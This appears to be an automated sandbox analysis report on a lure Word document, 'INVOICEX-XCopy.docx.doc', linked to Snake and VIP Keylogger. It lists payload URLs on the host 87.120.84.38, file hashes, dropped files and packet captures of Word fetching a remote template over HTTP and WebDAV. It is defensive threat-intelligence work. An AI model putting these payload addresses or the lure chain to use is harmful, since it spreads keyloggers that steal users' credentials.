    87.120.84.38PO Ref673947.docx.docGet hashmaliciousUnknownBrowse
    • 87.120.84.38/txt/mnobizx.doc
    mnobizx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38/txt/mnobizx.com
    yugozxcvb.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38/txt/yugozxcv.exe
    Quotation Botisk 1475-HIRSCH Technik,____________________________________________.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38/txt/dtgLBRsUB45qnMm.exe
    quotation list 1.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38/txt/EGwnUqNrVeLFNPw.exe
    Scanned Copy.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38/txt/RKbqmU7pcsLQXbJ.exe
    na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38/txt/9qP0xWlHdvhkbFG.exe
    na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38/txt/Rnuwcr38IRNoHzK.exe
    na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38/txt/iA8CGls28DqWbrP.exe
    Scan-Purchase Order3550..docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38/txt/iA8CGls28DqWbrP.exe
    No context
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    SHARCOM-ASBGPO Ref673947.docx.docGet hashmaliciousUnknownBrowse
    • 87.120.84.38
    mnobizx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38
    yugozxcvb.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38
    Quotation Botisk 1475-HIRSCH Technik,____________________________________________.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38
    quotation list 1.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38
    Scanned Copy.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38
    na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38
    na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38
    na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38
    Scan-Purchase Order3550..docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38
    No context
    No context
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):131072
    Entropy (8bit):0.025419031394342973
    Encrypted:false
    SSDEEP:6:I3DPcvHvxggLRNU+OSLRXv//4tfnRujlw//+GtluJ/eRuj:I3DPA6+BvYg3J/
    MD5:AE40C421BB48CCAAE56494A60E3FB099
    SHA1:5B1D8785CBE5D9B5CD7718CD1C32B98ECD27453E
    SHA-256:AC56F1441FEAEADFD5C45E6682A4C3635FF620896D1C5284E097EF22DD940400
    SHA-512:F0F2C1FE46EE5F742DD0348D9520BCA3527D22CEFC74F8BE3C3112D9C1B0E98740E14CFDAC3672DB7B204A587E1AD974495781E8395FA4E328A7D86C7C4F8E3B
    Malicious:false
    Reputation:low
    Preview:......M.eFy...zi.r..K..!.....S,...X.F...Fa.q.............................Qf.:..H.....5.................O.....!z......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):16384
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:3::
    MD5:CE338FE6899778AACFC28414F2D9498B
    SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
    SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
    SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
    Malicious:false
    Reputation:high, very likely benign file
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):1536
    Entropy (8bit):1.3556721012796193
    Encrypted:false
    SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbi:IiiiiiiiiifdLloZQc8++lsJe1Mzdn
    MD5:920B248E02E2D59544A87D890240E4E4
    SHA1:EBA80C7DD59454FC2760B78DE67DAC0F5D3C7DAC
    SHA-256:1F041AC1E99F9E39A3FDED99535CC539A2FC03341672EDD788BA99E9ACA7A85B
    SHA-512:B85CC8CC7022941A10F03BDB6CA73061DAC66EB5F29A20202DB9D85CA203ECABE72D4F0F6F8F5FE046DB68AAF7D5235DA98BFC2EA864EF71A8D4E986B062F450
    Malicious:false
    Reputation:low
    Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):1024
    Entropy (8bit):0.05390218305374581
    Encrypted:false
    SSDEEP:3:ol3lYdn:4Wn
    MD5:5D4D94EE7E06BBB0AF9584119797B23A
    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
    Malicious:false
    Reputation:high, very likely benign file
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):1879552
    Entropy (8bit):3.6504681095961264
    Encrypted:false
    SSDEEP:6144:6emBde8emQrde9emBdehemKembemBdeUemBdeQemBdehemHemBde2emBdeuemBd+:00s9
    MD5:4EED3A8E4CF59A1998DDD1077FC1207D
    SHA1:B06F180518710946443E3EBDBF3B63B1BF78EC25
    SHA-256:E13E4A9273A8659C12EBAB334E1FC45563C2FD2F0CE6CD3210B684AFA88B5188
    SHA-512:414174170F62AB12E56FBCE6E213B7FB3FFC150F71119D8D49924FE6C02B4B2A3BD0419A4585148A704F4C910F63C524F91FF543396B1C160217B5397F166A04
    Malicious:false
    Reputation:low
    Preview:..d.M.B.C.....B.E.S.O.N.D.E.R.H.E.D.E. .B.E.S.O.N.D.E.R.H.E.D.E. .V.I.R. .H.I.E.R.D.I.E. .M.A.A.N.D.....D.R.A.E.N.D.E. .N.R... .H.O.E.V.....3.0.2.0.8. .N.B.C. .D.R.A.A.G. .3.0. .S.T.K.....3.0.3.0.8. .N.B.C. .D.R.A.A.G. .6. .S.T.K.....3.2.0.0.7.X. .N.B.C. .D.R.A.A.G. .7.4. .S.T.K.....3.3.0.0.5. .N.B.C. .w.a.t. .5. .s.t.e.l.l.e. .d.r.a.....5.2.7.9.9. ./. .8.0.0.U. .(.2.5.8.7.7./.2.1.). .N.B.C. .w.a.t. .3.0. .P.C.S. .d.r.a.....6.0.0.1. .N.B.C. .w.a.t. .1.0.0. .s.t.u.k.s. .d.r.a.....6.0.0.4. .N.B.C. .w.a.t. ...................f...h...................................R...T..................................................................................................................................................................................................................................................................................................<...$..$.If........!v..h.#v..9.:V....l...,..t.......9..6.,.....5.....9.9...../.............B.....a..].p............yt.K......d........gd.
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):131072
    Entropy (8bit):0.02530809714456188
    Encrypted:false
    SSDEEP:6:I3DPcBRUqOxbvxggLRB6Hkk/g3RXv//4tfnRujlw//+GtluJ/eRuj:I3DPQGVZNfkoRvYg3J/
    MD5:6E38B858CAA8CADD63986AEC7D943F49
    SHA1:CB52AC7B1D51E4FACFB9FBF2B5DA6D0BB2C0BE9D
    SHA-256:D48ECCCB5E112AE686A09441C0969CDD0BDE76DCA2FFDB57BDA10867D23CEA82
    SHA-512:FADCF1306C55F8AAD3E0549171514379D10975DCDAE0215A16AF150B4B6D60FE05C066D6CE0D3D12F40199C06507AC433230E466B18ADAE4595FBB91A8882FEB
    Malicious:false
    Reputation:low
    Preview:......M.eFy...zF.1}...O.^....g.S,...X.F...Fa.q..............................._.:.F.F.v..A...........S..c.K....[D.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):131072
    Entropy (8bit):0.025419031394342973
    Encrypted:false
    SSDEEP:6:I3DPcvHvxggLRNU+OSLRXv//4tfnRujlw//+GtluJ/eRuj:I3DPA6+BvYg3J/
    MD5:AE40C421BB48CCAAE56494A60E3FB099
    SHA1:5B1D8785CBE5D9B5CD7718CD1C32B98ECD27453E
    SHA-256:AC56F1441FEAEADFD5C45E6682A4C3635FF620896D1C5284E097EF22DD940400
    SHA-512:F0F2C1FE46EE5F742DD0348D9520BCA3527D22CEFC74F8BE3C3112D9C1B0E98740E14CFDAC3672DB7B204A587E1AD974495781E8395FA4E328A7D86C7C4F8E3B
    Malicious:false
    Preview:......M.eFy...zi.r..K..!.....S,...X.F...Fa.q.............................Qf.:..H.....5.................O.....!z......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:10 2023, mtime=Fri Aug 11 15:42:10 2023, atime=Mon Oct 21 10:27:28 2024, length=327345, window=hide
    Category:dropped
    Size (bytes):1059
    Entropy (8bit):4.551094860384169
    Encrypted:false
    SSDEEP:12:8B29CjgXg/XAlCPCHaXNBedzB/qPX+WU2qmOXdQjuicvbsaNrD4vJGDtZ3YilMMy:8B26/XT98dz4/qmBNehNHrDv3qNA57u
    MD5:8E321370293FDEF96CD7EA9FA96A9B11
    SHA1:7EC7FF817FE4FC0E0400424AC49DE70DCE9C85A9
    SHA-256:667A1FBBF6DA4F2B91118717FF706D4E7C1733805002367C0A1498CA8F322C8F
    SHA-512:22138B1B2BD877D7FBA6713C307B8A3DE1C2A90FBE2CD3F711887D7393F6C609989F5C0A24D64636414CFF5C19E90A9BD0D611229A7644EBB68277CB8E4D1C6F
    Malicious:false
    Preview:L..................F.... .....S.r.....S.r....]86.#...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....UYl[..user.8......QK.XUYl[*...&=....U...............A.l.b.u.s.....z.1......WG...Desktop.d......QK.X.WG.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2.....UYo[ .INVOIC~1.DOC..\.......WF..WF.*.........................I.N.V.O.I.C.E.X.-.X.C.o.p.y...d.o.c.x...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\813848\Users.user\Desktop\INVOICEX-XCopy.docx.doc.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.N.V.O.I.C.E.X.-.X.C.o.p.y...d.o.c.x...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......813848..........D_....3N.
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Generic INItialization configuration [folders]
    Category:dropped
    Size (bytes):72
    Entropy (8bit):4.638471355518834
    Encrypted:false
    SSDEEP:3:M1KzqsX9A3cLBddpSm4SGsX9A3cLBddpSv:MczqAG3c1BrGAG3c1Bc
    MD5:3867B0CE9A3E704C8176195A833F4C8E
    SHA1:5B7AB2AA340599A93FA4D2572DF61105885ECA54
    SHA-256:989C3F93CCB57E0EB8549CA4ED2148E7FE5EB76C42A33DE3887F86372F31B257
    SHA-512:859A84566B4DECF49CE23AA79FEED206B719F1EB74F214C3B1608F1D685B38CE6CB79B44B06DFD999E79375C36D3FB9897C706DFBEB36643999496A9B7674379
    Malicious:false
    Preview:[doc]..INVOICEX-XCopy.docx.LNK=0..[folders]..INVOICEX-XCopy.docx.LNK=0..
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):162
    Entropy (8bit):2.4797606462020307
    Encrypted:false
    SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
    MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
    SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
    SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
    SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
    Malicious:false
    Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
    Category:dropped
    Size (bytes):2
    Entropy (8bit):1.0
    Encrypted:false
    SSDEEP:3:Qn:Qn
    MD5:F3B25701FE362EC84616A93A45CE9998
    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
    Malicious:false
    Preview:..
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):162
    Entropy (8bit):2.4797606462020307
    Encrypted:false
    SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
    MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
    SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
    SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
    SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
    Malicious:false
    Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
    File type:Microsoft Word 2007+
    Entropy (8bit):7.9933770268245175
    TrID:
    • Word Microsoft Office Open XML Format document (49504/1) 58.23%
    • Word Microsoft Office Open XML Format document (27504/1) 32.35%
    • ZIP compressed archive (8000/1) 9.41%
    File name:INVOICEX-XCopy.docx.doc
    File size:327'345 bytes
    MD5:ec621a479efeb5576dbe1ede8245894b
    SHA1:9a3c1d701f29f7f65c9d1fab217cd55a1cc3609e
    SHA256:06894236b22810452dd0bfaf02c3a0cde3428fe19eb9e789b344de6ba4079083
    SHA512:2523d728326cd120a7249c427cdb55f16a053c55b36a0ada964625dd1ef61f104cdb64763ff458dd2393c42a516dd2371eb51bb1390355cdd29e04672d114169
    SSDEEP:6144:t07JHBA0B56szCXqqqqqmzYhuO+FLh5C2z9mLx:2d/qYYFNHrz9c
    TLSH:E06412060C9780C883097859F1A9151E2B6F9C339D63CC359BF8DABB4A659CCD7B7B48
    File Content Preview:PK..........RY...7U... .......[Content_Types].xmlUT...6..g6..g6..g...n.0.E...............e.T.....U..<...;!.U.%U.M.d..sgby0ZW.[BB.|!.yOd.u0....>y....Iy.\.P.........M..X...s.x/%.9T....s...R..i&...j......:x.O].=.p...Z8.....I........U....Z...........r..s....B
    Icon Hash:2764a3aaaeb7bdbf
    Document Type:OpenXML
    Number of OLE Files:1
    Has Summary Info:
    Application Name:
    Encrypted Document:False
    Contains Word Document Stream:True
    Contains Workbook/Book Stream:False
    Contains PowerPoint Document Stream:False
    Contains Visio Document Stream:False
    Contains ObjectPool Stream:False
    Flash Objects Count:0
    Contains VBA Macros:False
    TimestampSource PortDest PortSource IPDest IP
    Oct 21, 2024 13:27:31.558346987 CEST4916380192.168.2.2287.120.84.38
    Oct 21, 2024 13:27:31.564153910 CEST804916387.120.84.38192.168.2.22
    Oct 21, 2024 13:27:31.564248085 CEST4916380192.168.2.2287.120.84.38
    Oct 21, 2024 13:27:31.564333916 CEST4916380192.168.2.2287.120.84.38
    Oct 21, 2024 13:27:31.569649935 CEST804916387.120.84.38192.168.2.22
    Oct 21, 2024 13:27:32.499454975 CEST804916387.120.84.38192.168.2.22
    Oct 21, 2024 13:27:32.499553919 CEST4916380192.168.2.2287.120.84.38
    Oct 21, 2024 13:27:32.957257032 CEST4916480192.168.2.2287.120.84.38
    Oct 21, 2024 13:27:32.964231014 CEST804916487.120.84.38192.168.2.22
    Oct 21, 2024 13:27:32.964510918 CEST4916480192.168.2.2287.120.84.38
    Oct 21, 2024 13:27:32.964512110 CEST4916480192.168.2.2287.120.84.38
    Oct 21, 2024 13:27:32.971540928 CEST804916487.120.84.38192.168.2.22
    Oct 21, 2024 13:27:33.898271084 CEST804916487.120.84.38192.168.2.22
    Oct 21, 2024 13:27:34.108083963 CEST804916487.120.84.38192.168.2.22
    Oct 21, 2024 13:27:34.108165979 CEST4916480192.168.2.2287.120.84.38
    Oct 21, 2024 13:27:37.073508024 CEST4916580192.168.2.2287.120.84.38
    Oct 21, 2024 13:27:37.081321001 CEST804916587.120.84.38192.168.2.22
    Oct 21, 2024 13:27:37.081418037 CEST4916580192.168.2.2287.120.84.38
    Oct 21, 2024 13:27:37.081549883 CEST4916580192.168.2.2287.120.84.38
    Oct 21, 2024 13:27:37.088407040 CEST804916587.120.84.38192.168.2.22
    Oct 21, 2024 13:27:38.038214922 CEST804916587.120.84.38192.168.2.22
    Oct 21, 2024 13:27:38.040889978 CEST4916580192.168.2.2287.120.84.38
    Oct 21, 2024 13:27:38.046467066 CEST804916587.120.84.38192.168.2.22
    Oct 21, 2024 13:27:38.339068890 CEST804916587.120.84.38192.168.2.22
    Oct 21, 2024 13:27:38.545488119 CEST4916580192.168.2.2287.120.84.38
    Oct 21, 2024 13:27:38.547390938 CEST804916587.120.84.38192.168.2.22
    Oct 21, 2024 13:27:38.547466040 CEST4916580192.168.2.2287.120.84.38
    Oct 21, 2024 13:27:38.681082010 CEST4916580192.168.2.2287.120.84.38
    Oct 21, 2024 13:27:38.686901093 CEST804916587.120.84.38192.168.2.22
    Oct 21, 2024 13:27:38.979559898 CEST804916587.120.84.38192.168.2.22
    Oct 21, 2024 13:27:38.979826927 CEST4916580192.168.2.2287.120.84.38
    Oct 21, 2024 13:27:38.985536098 CEST804916587.120.84.38192.168.2.22
    Oct 21, 2024 13:27:39.277832031 CEST804916587.120.84.38192.168.2.22
    Oct 21, 2024 13:27:39.477997065 CEST4916580192.168.2.2287.120.84.38
    Oct 21, 2024 13:27:39.619071007 CEST804916587.120.84.38192.168.2.22
    Oct 21, 2024 13:27:39.619144917 CEST4916580192.168.2.2287.120.84.38
    Oct 21, 2024 13:27:39.619998932 CEST804916587.120.84.38192.168.2.22
    Oct 21, 2024 13:27:39.913047075 CEST804916587.120.84.38192.168.2.22
    Oct 21, 2024 13:27:39.914808989 CEST4916580192.168.2.2287.120.84.38
    Oct 21, 2024 13:27:39.920401096 CEST804916587.120.84.38192.168.2.22
    Oct 21, 2024 13:27:40.211926937 CEST804916587.120.84.38192.168.2.22
    Oct 21, 2024 13:27:40.243146896 CEST4916380192.168.2.2287.120.84.38
    Oct 21, 2024 13:27:40.248938084 CEST804916387.120.84.38192.168.2.22
    Oct 21, 2024 13:27:40.417382002 CEST4916580192.168.2.2287.120.84.38
    Oct 21, 2024 13:27:40.540352106 CEST804916387.120.84.38192.168.2.22
    Oct 21, 2024 13:27:40.540426970 CEST4916380192.168.2.2287.120.84.38
    Oct 21, 2024 13:28:39.073144913 CEST804916487.120.84.38192.168.2.22
    Oct 21, 2024 13:28:39.073393106 CEST4916480192.168.2.2287.120.84.38
    Oct 21, 2024 13:28:39.073393106 CEST4916480192.168.2.2287.120.84.38
    Oct 21, 2024 13:28:39.079199076 CEST804916487.120.84.38192.168.2.22
    Oct 21, 2024 13:28:45.388437033 CEST804916587.120.84.38192.168.2.22
    Oct 21, 2024 13:28:45.388581038 CEST4916580192.168.2.2287.120.84.38
    Oct 21, 2024 13:28:45.402510881 CEST4916580192.168.2.2287.120.84.38
    Oct 21, 2024 13:28:45.407891989 CEST804916587.120.84.38192.168.2.22
    Oct 21, 2024 13:28:45.709167004 CEST804916387.120.84.38192.168.2.22
    Oct 21, 2024 13:28:45.709330082 CEST4916380192.168.2.2287.120.84.38
    Oct 21, 2024 13:29:30.132639885 CEST4916380192.168.2.2287.120.84.38
    Oct 21, 2024 13:29:30.138286114 CEST804916387.120.84.38192.168.2.22
    • 87.120.84.38
    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    0192.168.2.224916387.120.84.38803312C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    TimestampBytes transferredDirectionData
    Oct 21, 2024 13:27:31.564333916 CEST138OUTOPTIONS /txt/ HTTP/1.1
    User-Agent: Microsoft Office Protocol Discovery
    Host: 87.120.84.38
    Content-Length: 0
    Connection: Keep-Alive
    Oct 21, 2024 13:27:32.499454975 CEST187INHTTP/1.1 200 OK
    Server: nginx/1.26.2
    Date: Mon, 21 Oct 2024 11:27:32 GMT
    Content-Type: httpd/unix-directory
    Content-Length: 0
    Connection: keep-alive
    Allow: POST,OPTIONS,HEAD,GET
    Oct 21, 2024 13:27:40.243146896 CEST362OUTGET /txt/mncharliezx.doc HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: 87.120.84.38
    Connection: Keep-Alive
    Oct 21, 2024 13:27:40.540352106 CEST447INHTTP/1.1 404 Not Found
    Server: nginx/1.26.2
    Date: Mon, 21 Oct 2024 11:27:40 GMT
    Content-Type: text/html; charset=iso-8859-1
    Transfer-Encoding: chunked
    Connection: keep-alive
    Content-Encoding: gzip
    Data Raw: 65 36 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 4f c1 4a c4 30 14 bc f7 2b 9e 7b d2 83 79 6d 0d d8 43 08 ac db 2e 2e d4 b5 68 7a f0 98 dd 3c c9 c2 da d4 24 55 fc 7b d3 2e 82 97 07 33 6f 66 98 11 57 f5 f3 46 bd 75 0d 3c aa a7 16 ba fe a1 dd 6d 60 75 8b b8 6b d4 16 b1 56 f5 e5 53 b2 1c b1 d9 af 64 26 6c fc 38 4b 61 49 9b 04 e2 29 9e 49 f2 9c c3 de 45 d8 ba 69 30 02 2f 64 26 70 11 89 83 33 3f b3 af 90 ff 34 09 65 62 94 ca 12 78 fa 9c 28 44 32 d0 bf b4 f0 ad 03 0c 29 eb 7d ce 02 37 40 b4 a7 00 81 fc 17 79 26 70 9c 93 7c 3a da 18 4f 21 c8 f5 a8 8f 96 b0 64 9c f1 02 ae fb c3 34 c4 e9 06 5e 17 03 e8 08 d5 3d 2b ca 9c 55 9c dd 55 d0 39 9f 98 5c e0 9f 3d b5 5c fa a5 b2 f3 ae ec 17 81 af 29 7c 12 01 00 00 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e6MOJ0+{ymC..hz<$U{.3ofWFu<m`ukVSd&l8KaI)IEi0/d&p3?4ebx(D2)}7@y&p|:O!d4^=+UU9\=\)|0


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    1192.168.2.224916487.120.84.38803312C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    TimestampBytes transferredDirectionData
    Oct 21, 2024 13:27:32.964512110 CEST132OUTHEAD /txt/mncharliezx.doc HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Microsoft Office Existence Discovery
    Host: 87.120.84.38
    Oct 21, 2024 13:27:33.898271084 CEST154INHTTP/1.1 404 Not Found
    Server: nginx/1.26.2
    Date: Mon, 21 Oct 2024 11:27:33 GMT
    Content-Type: text/html; charset=iso-8859-1
    Connection: keep-alive
    Oct 21, 2024 13:27:34.108083963 CEST154INHTTP/1.1 404 Not Found
    Server: nginx/1.26.2
    Date: Mon, 21 Oct 2024 11:27:33 GMT
    Content-Type: text/html; charset=iso-8859-1
    Connection: keep-alive


    Session IDSource IPSource PortDestination IPDestination Port
    2192.168.2.224916587.120.84.3880
    TimestampBytes transferredDirectionData
    Oct 21, 2024 13:27:37.081549883 CEST132OUTOPTIONS /txt HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
    translate: f
    Host: 87.120.84.38
    Oct 21, 2024 13:27:38.038214922 CEST529INHTTP/1.1 301 Moved Permanently
    Server: nginx/1.26.2
    Date: Mon, 21 Oct 2024 11:27:37 GMT
    Content-Type: text/html; charset=iso-8859-1
    Content-Length: 310
    Connection: keep-alive
    Location: http://87.120.84.38/txt/
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 38 37 2e 31 32 30 2e 38 34 2e 33 38 2f 74 78 74 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 38 37 2e 31 32 30 2e 38 34 2e 33 38 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://87.120.84.38/txt/">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 87.120.84.38 Port 80</address></body></html>
    Oct 21, 2024 13:27:38.040889978 CEST133OUTOPTIONS /txt/ HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
    translate: f
    Host: 87.120.84.38
    Oct 21, 2024 13:27:38.339068890 CEST187INHTTP/1.1 200 OK
    Server: nginx/1.26.2
    Date: Mon, 21 Oct 2024 11:27:38 GMT
    Content-Type: httpd/unix-directory
    Content-Length: 0
    Connection: keep-alive
    Allow: POST,OPTIONS,HEAD,GET
    Oct 21, 2024 13:27:38.547390938 CEST187INHTTP/1.1 200 OK
    Server: nginx/1.26.2
    Date: Mon, 21 Oct 2024 11:27:38 GMT
    Content-Type: httpd/unix-directory
    Content-Length: 0
    Connection: keep-alive
    Allow: POST,OPTIONS,HEAD,GET
    Oct 21, 2024 13:27:38.681082010 CEST162OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 74 78 74 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52
    Data Ascii: PROPFIND /txt HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 87.120.84.38
    Oct 21, 2024 13:27:38.979559898 CEST529INHTTP/1.1 301 Moved Permanently
    Server: nginx/1.26.2
